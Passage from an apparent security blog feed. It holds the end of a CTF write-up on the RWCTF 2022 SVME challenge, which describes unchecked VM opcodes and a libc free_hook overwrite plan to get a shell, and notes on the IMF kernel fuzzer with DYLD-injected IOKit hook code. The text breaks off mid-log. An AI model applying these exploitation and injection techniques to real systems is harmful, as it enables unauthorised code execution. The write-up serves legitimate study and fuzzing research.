class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;vm.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span 
class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> code[<span class="number">128</span>], nread = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span> (nread &lt; <span class="built_in">sizeof</span>(code)) &#123;</span><br><span class="line">        <span class="type">int</span> ret = <span class="built_in">read</span>(<span class="number">0</span>, code+nread, <span class="built_in">sizeof</span>(code)-nread);</span><br><span class="line">        <span class="keyword">if</span> (ret &lt;= <span class="number">0</span>) <span class="keyword">break</span>;</span><br><span class="line">        nread += ret;</span><br><span class="line">    &#125;</span><br><span class="line">    VM *vm = <span class="built_in">vm_create</span>(code, nread/<span class="number">4</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">vm_exec</span>(vm, <span class="number">0</span>, <span class="literal">true</span>);</span><br><span class="line">    <span class="built_in">vm_free</span>(vm);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Run the following commands to set up the environment:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:parrt/simple-virtual-machine-C.git</span><br><span class="line"><span class="built_in">cp</span> ./main.c ./simple-virtual-machine-C/src/vmtest.c</span><br><span class="line"><span class="built_in">cd</span> simple-virtual-machine-C</span><br><span class="line">cmake .</span><br><span class="line">make</span><br></pre></td></tr></table></figure><h3 id="3-漏洞点-3">3. Vulnerability</h3><p>First, the layout of the VM struct can be seen at <a href="https://github.com/parrt/simple-virtual-machine-C/blob/master/src/vm.h#L40">#L40</a>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">int</span> returnip;</span><br><span class="line">    <span class="type">int</span> locals[DEFAULT_NUM_LOCALS];</span><br><span class="line">&#125; Context;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">int</span> *code;</span><br><span class="line">    <span class="type">int</span> code_size;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// global variable space</span></span><br><span class="line">    <span class="type">int</span> *globals;</span><br><span class="line">    <span class="type">int</span> nglobals;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Operand stack, grows upwards</span></span><br><span class="line">    <span class="type">int</span> 
stack[DEFAULT_STACK_SIZE];</span><br><span class="line">    Context call_stack[DEFAULT_CALL_STACK_SIZE];</span><br><span class="line">&#125; VM;</span><br></pre></td></tr></table></figure><p>From main.c, it follows that in the created VM struct the <strong>code field points to the stack</strong> and the <strong>globals field points to the heap</strong>.</p><p>The handlers for the LOAD and STORE opcodes never bounds-check the offset taken from the code stream, so they allow reads and writes at an arbitrary offset <strong>relative to the VM struct (which itself lives on the heap)</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> LOAD: <span class="comment">// load local or arg</span></span><br><span class="line">    offset = vm-&gt;code[ip++];</span><br><span class="line">    vm-&gt;stack[++sp] = vm-&gt;call_stack[callsp].locals[offset];</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">[...]</span><br><span class="line"><span class="keyword">case</span> STORE:</span><br><span class="line">    offset = vm-&gt;code[ip++];</span><br><span class="line">    vm-&gt;call_stack[callsp].locals[offset] = vm-&gt;stack[sp--];</span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure><p>Likewise, the GLOAD and GSTORE opcodes allow reads and writes at an arbitrary offset <strong>relative to the memory that the globals pointer refers to</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> GLOAD: <span class="comment">// load from global 
memory</span></span><br><span class="line">    addr = vm-&gt;code[ip++];</span><br><span class="line">    vm-&gt;stack[++sp] = vm-&gt;globals[addr];</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> GSTORE:</span><br><span class="line">    addr = vm-&gt;code[ip++];</span><br><span class="line">    vm-&gt;globals[addr] = vm-&gt;stack[sp--];</span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure><p>These opcodes can therefore be used to leak pointers and to read and write arbitrary memory, then overwrite the free hook in libc and hijack control flow when the VM exits.</p><h3 id="4-利用流程-3">4. Exploitation Flow</h3><ul><li><p>Use STORE to move the top of <code>VM-&gt;stack</code> toward lower addresses, read the globals and code pointer values, and <strong>save them in vm-&gt;call_stack</strong>; then restore <code>VM-&gt;stack</code>.</p><blockquote><p>Restoring overwrites the globals and code pointers, so make sure they are rewritten with the correct values.</p></blockquote></li><li><p>Use the arbitrary read to fetch the libc_start_main return address from the stack, and compute the libc base, free_hook, and one_gadget addresses.</p></li><li><p>Use the arbitrary write to set the free_hook entry to the one_gadget address, hijacking control flow to get a shell.</p></li></ul><blockquote><p>The exploitation here is fairly simple, so I skipped writing the exploit.</p></blockquote>]]></content>
    
    
      
      
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;These are my notes from reviewing three RWCTF 2022 challenges:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;QLaas&lt;/li&gt;
&lt;li&gt;Who Moved My Block&lt;/li&gt;
&lt;li&gt;SVME&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The notes were written while working through these three challenges.&lt;/p&gt;</summary>
      
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
  </entry>
  
  <entry>
    <title>Paper Notes on "IMF: Inferred Model-based Fuzzer"</title>
    <link href="https://kiprey.github.io/2022/01/IMF/"/>
    <id>https://kiprey.github.io/2022/01/IMF/</id>
    <published>2022-01-19T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.784Z</updated>
    
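    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><ul><li><p>Calls to kernel API functions mostly depend on one another: some API calls rely on context produced by other API calls. If the supplied call context is invalid, the kernel API will always fail and never reach deeper logic.</p></li><li><p>This paper proposes a new approach to kernel fuzzing. It uses the dependencies between kernel API functions (that is, the similarity of API call sequences) to infer a dependency model, then uses that model to generate <strong>random yet well-structured API sequences</strong> for deeper fuzzing.</p><p>API call dependencies come in two kinds:</p><ol><li>Ordering dependency: function A should be called before function B.</li><li>Data dependency: data flows from one function call to another.</li></ol></li><li><p>The main fuzzing target is <strong>IOKit Lib</strong>.</p></li><li><p>IMF src - <a href="https://github.com/SoftSec-KAIST/IMF">github</a></p></li></ul><blockquote><p>Note that this paper dates from 2017 and its experiments used macOS 10.12.3, whereas my machine runs macOS 12.0.1, so reproducing the experiments involves some difficulties.</p></blockquote><span id="more"></span><h2 id="二、架构">II. Architecture</h2><p>The architecture of IMF as proposed in the paper is shown below:</p><p><img src="/2022/01/IMF/image-20220118102357121.png" alt="image-20220118102357121"></p><p>IMF consists of three components:</p><ul><li>Logger: records the API call log of a given application. The log includes the names of the called functions, the argument values passed in, and other data.</li><li>Inferrer: infers <strong>ordering and data dependencies</strong> from the API logs produced by the Logger. It first selects, from the L logs the Logger generated, the N (N &lt; L) logs that share the longest common prefix; these N logs are then used to infer dependencies and build the API dependency model.</li><li>Fuzzer: uses the inferred API dependency model to dynamically generate test cases and run them.</li></ul><h2 id="三、例子">III. Example</h2><p>The paper walks through an example fuzzing run, which gives a quick picture of the whole IMF pipeline.</p><h3 id="1-初始">1. Initial Setup</h3><p>Initially, a set of configuration files and an <strong>API function prototype annotation file</strong> are provided. The latter stores the function names, parameter types and counts, and similar information for the target IOKit APIs, usually in JSON format.</p><p>The annotation file is mainly used to generate the API hooks and to support API dependency inference.</p><h3 id="2-安装-API-hook">2. Installing API Hooks</h3><ul><li><p>IMF first <strong>installs API hooks</strong> for the target program, 2048 Game, so that whenever the target calls into IOKit Lib, the calls are hooked and logged.</p></li><li><p>Simulated mouse or keyboard input is then fed to the target program, which makes it call IOKit and leave API logs.</p></li><li><p>The target program is run in a loop L=1000 times, yielding L logs.</p></li></ul><blockquote><p>Note that when I reproduced the experiment, hooking 2048 Game recorded no IOKit logs at all, possibly because of the macOS version (hooking VSCode did work, though it produced few logs).</p><p>I therefore chose <code>/usr/sbin/ioreg</code> as the target program for my experiments.</p></blockquote><p>Each log records, for every API call, <strong>1) the types and values of the input arguments; 2) the type and value of the return value</strong>.</p><h3 id="3-过滤-API-log">3. 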
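Filtering the API Logs</h3><p>At this point the API hooks have recorded L=1000 logs, which now need to be filtered down to a subset.</p><p>In this example, the N=2 logs with the <strong>longest common prefix</strong> are selected from the L=1000 logs.</p><blockquote><p>Note that because GUI events are nondeterministic, the hooks <strong>may not produce the same API call sequence</strong> even for identical input to the same GUI program.</p><p>If the target is a non-GUI program, however, the generated API logs are largely identical.</p></blockquote><h3 id="4-依赖推断">4. Dependency Inference</h3><h4 id="a-顺序依赖">a. Ordering Dependencies</h4><p>IMF first assumes that the order of API calls in the logs should be preserved. This may put unnecessary ordering dependencies into the model, making the inferred ordering an over-approximation. The assumption is relaxed somewhat during actual fuzzing.</p><p>The call order obtained at this point is shown below, where $A&lt;B$ means that function A is called <strong>before</strong> function B:</p><p>$$IOServiceMatching &lt; IOServiceGetMatchingService &lt; IOServiceOpen &lt; IOConnectCallMethod$$</p><h4 id="b-数据依赖">b. Data Dependencies</h4><p>Next, working from the N=2 log subset, IMF will:</p><ol><li>Detect and identify <strong>constant parameter values</strong>. In the figure below, <strong>green</strong> text marks constants, which are excluded from the data-flow analysis:</li></ol><blockquote><p>Note that because an API function prototype annotation file was supplied earlier, parameters of handle types (such as <code>io_service_t</code> and <code>io_connect_t</code>) are not identified as constants.</p></blockquote><p><img src="/2022/01/IMF/image-20220118114142794.png" alt="image-20220118114142794"></p><ol start="2"><li><p>Detect data dependencies. If the return value of an earlier call is used as an argument value of a later call, the two calls have a data dependency, as marked by the black dashed lines in the figure.</p><p>The paper implements several heuristics for detecting data dependencies; only one is briefly described here.</p></li></ol><h4 id="c-模型生成">c. Model Generation</h4><p>The figure below is the API model generated from the figure above; the model is represented as an AST:</p><p><img src="/2022/01/IMF/image-20220118120407950.png" alt="image-20220118120407950"></p><p>In this model, every function call clearly follows the previously inferred ordering dependencies as well as the value dependencies between functions.</p><p>For the relationship between the pointer outStructCnt and the API, IMF can likewise derive it from the annotation file supplied earlier, and thus emit code such as line 9.</p><p>IMF can then mutate and generate test cases based on the model.</p><h2 id="四、具体实现">IV. Implementation Details</h2><h3 id="1-Logger">1. Logger</h3><h4 id="a-论文细节">a. Details from the Paper</h4><p>The Logger has to deal with two questions:</p><ul><li>Where does the input to the target program come from?</li><li>How much data should be recorded in the log?</li></ul><p>On the first question: most target programs used in the paper are GUI programs, whose input mostly consists of mouse and keyboard events, so PyUserInput can be used to simulate input events for the target.</p><p>On the second question: how many levels of pointer indirection should be saved when logging? Too many levels would take up a lot of disk space and make analysis harder, so the paper's experiments save only one level of pointer indirection.</p><h4 id="b-技术细节">b. 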
Technical details</h4><p>In the code released with the paper, the <code>const.py</code> file already contains the prototype definitions of the target IOKit APIs. A simple example:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># const.py</span></span><br><span class="line">API_DEFS = [</span><br><span class="line">    [</span><br><span class="line">        <span class="comment"># kern_return_t IOConnectGetService(io_connect_t connect, io_service_t *service);</span></span><br><span class="line">        (<span class="string">&#x27;kern_return_t&#x27;</span>, <span class="string">&#x27;IOConnectGetService&#x27;</span>), </span><br><span class="line">        [</span><br><span class="line">            <span class="comment"># First parameter</span></span><br><span class="line">            (<span class="string">&#x27;io_connect_t&#x27;</span>, <span class="string">&#x27;connect&#x27;</span>, &#123;&#125;), </span><br><span class="line">            <span class="comment"># Second parameter. For a pointer parameter, the third field (a dict) carries an IO key that says whether the function writes data into the pointed-to memory or reads data out of it; this feeds the later data-flow analysis.</span></span><br><span class="line">            (<span class="string">&#x27;io_service_t *&#x27;</span>, <span class="string">&#x27;service&#x27;</span>, &#123;<span class="string">&#x27;IO&#x27;</span>:<span class="string">&#x27;O&#x27;</span>&#125;) </span><br><span class="line">        ]</span><br><span class="line">    ],</span><br><span class="line">    ......</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>Next, <code>hook.py</code> 
combines the given IOKit API prototypes with a C hook-code template to generate a hook.c file such as the following:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span 
class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;time.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;IOKit/IOKitLib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/file.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span 
class="keyword">include</span> <span class="string">&lt;CoreFoundation/CoreFoundation.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> LOG_PATH</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> LOG_PATH <span class="string">&quot;/tmp/log&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">const</span> <span class="type">char</span>* log_path = LOG_PATH;</span><br><span class="line"><span class="comment">// 生成 JSON 格式</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">log_CFTypeRef</span><span class="params">(FILE *f,CFTypeRef target)</span></span>&#123;</span><br><span class="line">  CFTypeID ty = <span class="built_in">CFGetTypeID</span>(target);</span><br><span class="line">  <span class="keyword">if</span> (ty == <span class="built_in">CFStringGetTypeID</span>())&#123;</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;&#x27;%s&#x27;&quot;</span>,<span class="built_in">CFStringGetCStringPtr</span>(target,kCFStringEncodingUTF8));</span><br><span class="line">  &#125;<span class="keyword">else</span> <span class="keyword">if</span> (ty == <span class="built_in">CFDictionaryGetTypeID</span>())&#123;</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;&#123;&quot;</span>);</span><br><span class="line">    <span class="type">size_t</span> size = <span class="built_in">CFDictionaryGetCount</span>(target);</span><br><span class="line">    CFTypeRef *keys = (CFTypeRef *) <span class="built_in">malloc</span>( size * <span class="built_in">sizeof</span>(CFTypeRef) );</span><br><span class="line">    CFTypeRef *vals = (CFTypeRef *) <span 
class="built_in">malloc</span>( size * <span class="built_in">sizeof</span>(CFTypeRef) );</span><br><span class="line">    <span class="built_in">CFDictionaryGetKeysAndValues</span>(target,keys,vals);</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">size_t</span> i=<span class="number">0</span>;i&lt;size; i++)&#123;</span><br><span class="line">      <span class="built_in">log_CFTypeRef</span>(f,keys[i]);</span><br><span class="line">      <span class="built_in">fprintf</span>(f,<span class="string">&quot;:&quot;</span>);</span><br><span class="line">      <span class="built_in">log_CFTypeRef</span>(f,vals[<span class="number">0</span>]);</span><br><span class="line">      <span class="built_in">fprintf</span>(f,<span class="string">&quot;,&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;&#125;&quot;</span>);</span><br><span class="line">    <span class="built_in">free</span>(keys);</span><br><span class="line">    <span class="built_in">free</span>(vals);</span><br><span class="line">  &#125;<span class="keyword">else</span> <span class="keyword">if</span> (ty == <span class="built_in">CFNumberGetTypeID</span>())&#123;</span><br><span class="line">    <span class="type">uint64_t</span> n;</span><br><span class="line">    <span class="built_in">CFNumberGetValue</span>(target,<span class="built_in">CFNumberGetType</span>(target),&amp;n);</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;%d&quot;</span>,n);</span><br><span class="line">  &#125;<span class="keyword">else</span> <span class="keyword">if</span> (ty == <span class="built_in">CFBooleanGetTypeID</span>())&#123;</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;%s&quot;</span>,<span 
class="built_in">CFBooleanGetValue</span>(target)?<span class="string">&quot;True&quot;</span>:<span class="string">&quot;False&quot;</span>);</span><br><span class="line">  &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;log_CFTypeRef ERROR&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// IOCatalogueReset 函数 hook 后的处理操作</span></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">fake_IOCatalogueReset</span><span class="params">(<span class="type">mach_port_t</span> masterPort,<span class="type">uint32_t</span> flag)</span></span>&#123;</span><br><span class="line">  FILE *fp = <span class="built_in">fopen</span>(log_path,<span class="string">&quot;a&quot;</span>);</span><br><span class="line">  <span class="built_in">flock</span>(<span class="built_in">fileno</span>(fp),LOCK_EX);</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;IN [&#x27;IOCatalogueReset&#x27;,&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="number">1</span>) <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;masterPort&#x27;,&#x27;value&#x27;: 0x%x,&#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:0x%x, &#x27;data&#x27;:[&quot;</span>,masterPort, <span class="built_in">sizeof</span>(<span class="type">mach_port_t</span>),<span class="number">1</span>);</span><br><span class="line">  <span class="keyword">else</span> <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;masterPort&#x27;,&#x27;value&#x27;: 0x%x, &#x27;size&#x27; : 
0x%lx,&#x27;cnt&#x27;:&#x27;undefined&#x27;, &#x27;data&#x27;:[&quot;</span>,masterPort,<span class="built_in">sizeof</span>(<span class="type">mach_port_t</span>));</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;]&#125;,&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="number">1</span>) <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;flag&#x27;,&#x27;value&#x27;: 0x%x,&#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:0x%x, &#x27;data&#x27;:[&quot;</span>,flag, <span class="built_in">sizeof</span>(<span class="type">uint32_t</span>),<span class="number">1</span>);</span><br><span class="line">  <span class="keyword">else</span> <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;flag&#x27;,&#x27;value&#x27;: 0x%x, &#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:&#x27;undefined&#x27;, &#x27;data&#x27;:[&quot;</span>,flag,<span class="built_in">sizeof</span>(<span class="type">uint32_t</span>));</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;]&#125;,&quot;</span>);</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;]\n&quot;</span>);</span><br><span class="line">  <span class="type">kern_return_t</span> ret = <span class="built_in">IOCatalogueReset</span>(masterPort,flag);</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;OUT [&#x27;IOCatalogueReset&#x27;,&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="number">1</span>) <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;ret&#x27;,&#x27;value&#x27;: 0x%x,&#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:0x%x, &#x27;data&#x27;:[&quot;</span>,ret, <span class="built_in">sizeof</span>(<span 
class="type">kern_return_t</span>),<span class="number">1</span>);</span><br><span class="line">  <span class="keyword">else</span> <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;ret&#x27;,&#x27;value&#x27;: 0x%x, &#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:&#x27;undefined&#x27;, &#x27;data&#x27;:[&quot;</span>,ret,<span class="built_in">sizeof</span>(<span class="type">kern_return_t</span>));</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;]&#125;,&quot;</span>);</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;]\n&quot;</span>);</span><br><span class="line">  <span class="built_in">fclose</span>(fp);</span><br><span class="line">  <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">interposer</span> &#123;</span><br><span class="line">    <span class="type">void</span>* replacement;</span><br><span class="line">    <span class="type">void</span>* original;</span><br><span class="line">&#125; <span class="type">interpose_t</span>;</span><br><span class="line">__attribute__((used)) <span class="type">static</span> <span class="type">const</span> <span class="type">interpose_t</span> interposers[]</span><br><span class="line">  __attribute__((<span class="built_in">section</span>(<span class="string">&quot;__DATA, __interpose&quot;</span>))) = &#123;</span><br><span class="line">    &#123; </span><br><span class="line">        .replacement = (<span class="type">void</span>*) fake_IOCatalogueReset, </span><br><span class="line">        .original    = (<span class="type">void</span>*) IOCatalogueReset</span><br><span class="line">    &#125;,</span><br><span class="line">    [...]</span><br><span 
class="line">  &#125;;</span><br></pre></td></tr></table></figure><p><code>hook.py</code> generates the <code>fake_IOXXXX</code> functions in bulk and fills the corresponding entries into the interposers array.</p><p>Once the <code>hook.py hook.c</code> command has finished and produced hook.c, the following command builds the dylib to be injected:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">clang  -Wall -dynamiclib -framework IOKit -framework CoreFoundation -<span class="built_in">arch</span> x86_64 hook.c -o hook.dylib</span><br></pre></td></tr></table></figure><p>Then run the following command:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DYLD_INSERT_LIBRARIES=<span class="variable">$&#123;PWD&#125;</span>/hook.dylib [program path] [program args]</span><br></pre></td></tr></table></figure><p>Now, whenever the target program uses IOKit lib, the corresponding IOKit functions are hooked dynamically by the injected library hook.dylib, and a log is written to /tmp/log:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span 
class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># kern_return_t IORegistryEntryGetLocationInPlane(</span></span><br><span class="line"><span class="comment"># io_registry_entry_t entry,</span></span><br><span class="line"><span class="comment">#   const io_name_t   plane,</span></span><br><span class="line"><span class="comment"># io_name_t           location );</span></span><br><span class="line"></span><br><span class="line">IN </span><br><span class="line">[</span><br><span class="line">  <span class="string">&#x27;IORegistryEntryGetLocationInPlane&#x27;</span>,</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="string">&#x27;name&#x27;</span>:<span class="string">&#x27;entry&#x27;</span>,   <span class="comment"># parameter 1: variable name</span></span><br><span class="line">    <span class="string">&#x27;value&#x27;</span>: <span class="number">0x2607</span>,  <span class="comment"># parameter 1: value passed at the call</span></span><br><span class="line">    <span class="string">&#x27;size&#x27;</span> : <span class="number">0x4</span>,     <span class="comment"># parameter 1: size in memory, i.e. sizeof(type)</span></span><br><span class="line">        <span class="string">&#x27;cnt&#x27;</span>:<span class="number">0x1</span>,    <span class="comment"># parameter 1: if it is a pointer, the number of values it points to</span></span><br><span class="line">        <span class="string">&#x27;ori&#x27;</span>:<span class="string">&#x27;IOServiceGetMatchingService(</span></span><br><span 
class="string">          0,IOServiceMatching(</span></span><br><span class="line"><span class="string">            &quot;IOUserServer(com.apple.driverkit.AppleUserHIDDrivers-0x100000419)&quot;))&#x27;</span>, </span><br><span class="line">        <span class="string">&#x27;data&#x27;</span>:[]     <span class="comment"># 参数1 若是指针，则指针所指向的数组的所有值</span></span><br><span class="line">  &#125;,</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="string">&#x27;name&#x27;</span>:<span class="string">&#x27;plane&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;value&#x27;</span>: <span class="string">&#x27;&quot;IOService&quot;&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;size&#x27;</span> : <span class="number">0x80</span>,</span><br><span class="line">    <span class="string">&#x27;cnt&#x27;</span>:<span class="number">0x1</span>, </span><br><span class="line">    <span class="string">&#x27;data&#x27;</span>:[]</span><br><span class="line">  &#125;,</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="string">&#x27;name&#x27;</span>:<span class="string">&#x27;location&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;value&#x27;</span>: <span class="string">&#x27;&quot;x&amp;&quot;&#x27;</span>,</span><br><span 